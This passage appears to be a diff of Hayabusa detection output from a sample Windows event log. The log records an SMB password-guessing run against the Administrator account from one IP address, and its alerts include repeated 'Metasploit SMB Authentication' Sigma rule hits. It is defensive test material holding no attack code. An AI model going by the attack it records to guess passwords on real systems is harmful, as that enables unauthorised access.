+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
